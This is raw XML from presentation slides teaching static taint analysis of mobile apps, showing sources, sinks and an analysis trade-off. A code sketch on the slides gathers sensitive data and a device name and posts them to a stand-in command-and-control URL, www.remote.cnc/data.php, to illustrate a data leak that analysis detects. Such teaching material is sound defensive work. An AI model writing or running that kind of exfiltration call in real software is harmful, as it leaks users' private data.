                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:contourClr>
              </a:sp3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean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Helvetica Neue Condensed" charset="0"/>
                  <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
                </a:rPr>
                <a:t>Uber</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0"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Helvetica Neue Condensed" charset="0"/>
                  <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                  <a:cs typeface="Helvetica Neue Condensed" charset="0"/>
                </a:rPr>
                <a:t> Flashlight</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1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 Neue Condensed" charset="0"/>
                <a:ea typeface="Helvetica Neue Condensed" charset="0"/>
                <a:cs typeface="Helvetica Neue Condensed" charset="0"/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1487203" y="3773273"/>
            <a:ext cx="216458" cy="260072"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26999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>
            <a:bevelT w="50800" h="139700" prst="divot"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:extrusionClr>
            <a:contourClr>
              <a:schemeClr val="tx1">
                <a:lumMod val="85000"/>
                <a:lumOff val="1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2340451" y="3723518"/>
            <a:ext cx="1406622" cy="50560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1245941"/>
            <a:ext cx="9144000" cy="3897559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135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en-US" dirty="0"/>
              <a:t>Static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Taint Analysis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615254" y="1057810"/>
            <a:ext cx="7458075" cy="33242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5D5D5"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D5D5D5">
                  <a:gamma/>
                  <a:tint val="23922"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1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  <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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deviceName</a:t>
            </a:r>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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getDeviceName();</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1" smtClean="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  <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// ...	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0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"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0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senesitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="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  <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1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  <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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794965" y="932266"/>
            <a:ext cx="6553200" cy="533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1B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB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bg1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
              </a:schemeClr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altLang="en-US" sz="1600" noProof="1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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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data </a:t>
            </a:r>
            <a:r>
              <a:rPr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= get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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SensitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1">
              <a:solidFill>
                <a:srgbClr val="A31515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1197864" y="3035834"/>
            <a:ext cx="6019800" cy="5334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91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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data2 </a:t>
            </a:r>
            <a:r>
              <a:rPr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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0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……………………………………………………</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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20" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1807464" y="4255034"/>
            <a:ext cx="6742176" cy="53340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bg1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
              </a:schemeClr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US" altLang="en-US" sz="1600" noProof="1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PostRequest("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.remote.cnc/data.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty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", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0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data2);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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1023239" y="1454685"/>
            <a:ext cx="7696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altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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data </a:t>
            </a:r>
            <a:r>
              <a:rPr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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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getSensitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1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1023239" y="2435758"/>
            <a:ext cx="7696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altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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data2 </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>"DeviceName="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0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 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1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deviceName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0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 + </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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1031177" y="3662897"/>
            <a:ext cx="7696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noProof="1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PostRequest("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.remote.cnc/data.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty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", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean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rPr>
              <a:t>data2);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="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2569464" y="3416835"/>
            <a:ext cx="5230812" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2388"/>
              <a:gd name="T1" fmla="*/ 0 h 632"/>
              <a:gd name="T2" fmla="*/ 2388 w 2388"/>
              <a:gd name="T3" fmla="*/ 632 h 63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388" h="632">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="300"/>
                  <a:pt x="2216" y="136"/>
                  <a:pt x="2388" y="632"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFF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2167683" y="1283234"/>
            <a:ext cx="4218708" cy="1905000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1776"/>
              <a:gd name="T1" fmla="*/ 0 h 1296"/>
              <a:gd name="T2" fmla="*/ 1776 w 1776"/>
              <a:gd name="T3" fmla="*/ 1296 h 129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76" h="1296">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="300"/>
                  <a:pt x="1604" y="800"/>
                  <a:pt x="1776" y="1296"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF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6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56429" y="940758"/>
            <a:ext cx="608013" cy="576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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3231428" y="1616666"/>
            <a:ext cx="3060700" cy="750888"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33555"/>
              <a:gd name="adj2" fmla="val -87445"/>
              <a:gd name="adj3" fmla="val 1666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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b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– a method returning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0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sensitive data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" dirty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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="451749" y="3375975"/>
            <a:ext cx="1909754" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41390"/>
              <a:gd name="adj2" fmla="val 95751"/>
              <a:gd name="adj3" fmla="val 16667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l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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Sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b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- a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0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method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean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leaking out data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" dirty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538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124E-6 -1.84202E-6 C 2.08124E-6 0.00031 0.09512 0.04474 0.10276 0.1360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8" y="67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1002E-6 -1.41932E-6 C 0.0085 -0.03054 0.00555 -0.07652 -0.0158 -0.0805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40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65E-8 4.79173E-6 C 0.02534 0.02869 0.03333 0.10737 0.03263 0.1416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" y="70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879E-6 4.8195E-6 L -0.24336 -0.00062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8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36 -0.00062 C -0.23069 0.02375 -0.23173 0.09133 -0.1649 0.15026 C -0.09842 0.2095 0.09061 0.31132 0.15605 0.35359 C 0.22184 0.39555 0.21333 0.39308 0.22844 0.40388 " pathEditMode="relative" rAng="0" ptsTypes="A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90" y="20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44 0.40388 L -0.19823 0.41067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33" y="3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23 0.41067 C -0.18469 0.42826 -0.19111 0.48812 -0.11456 0.51866 C -0.09738 0.53347 0.17532 0.57235 0.25933 0.59395 C 0.34335 0.61493 0.36175 0.63684 0.38917 0.64856 " pathEditMode="relative" rAng="0" ptsTypes="A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70" y="11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917 0.64857 L -0.21368 0.65165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51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5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Taint Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Trade-Off Challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5882615" y="2547128"/>
            <a:ext cx="2209800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="404040"/>
          </a:soli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altLang="en-US" sz="1200">
              <a:latin typeface="Courier New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929740" y="1068769"/>
            <a:ext cx="2514600" cy="663547"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1067"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="404040"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill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2234542" y="1235456"/>
            <a:ext cx="379413" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB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altLang="en-US" sz="160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2993892" y="1921694"/>
            <a:ext cx="379413" cy="36671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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New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90295" y="1294896"/>
            <a:ext cx="137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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Tahoma" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sources: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48615" y="4296893"/>
            <a:ext cx="1295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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Tahoma" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r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996542" y="1221169"/>
            <a:ext cx="379413" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB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altLang="en-US" sz="160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12" name="Oval 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3836328" y="1235456"/>
            <a:ext cx="379412" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB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altLang="en-US" sz="160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13" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1929359" y="4050544"/>
            <a:ext cx="4114800" cy="686664"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="404040"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:extLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2234161" y="4217231"/>
            <a:ext cx="379413" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191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altLang="en-US" sz="160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2996161" y="4202945"/>
            <a:ext cx="379413" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191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altLang="en-US" sz="160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3835947" y="4217231"/>
            <a:ext cx="379412" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191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altLang="en-US" sz="160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4672561" y="4217231"/>
            <a:ext cx="379413" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191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altLang="en-US" sz="160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18" name="Oval 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5436147" y="4217231"/>
            <a:ext cx="379412" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6035017" y="2728105"/>
            <a:ext cx="379413" cy="36671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 altLang="en-US" sz="1200">
              <a:latin typeface="Courier New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Oval 40"/>
          <p:cNvSpPr>
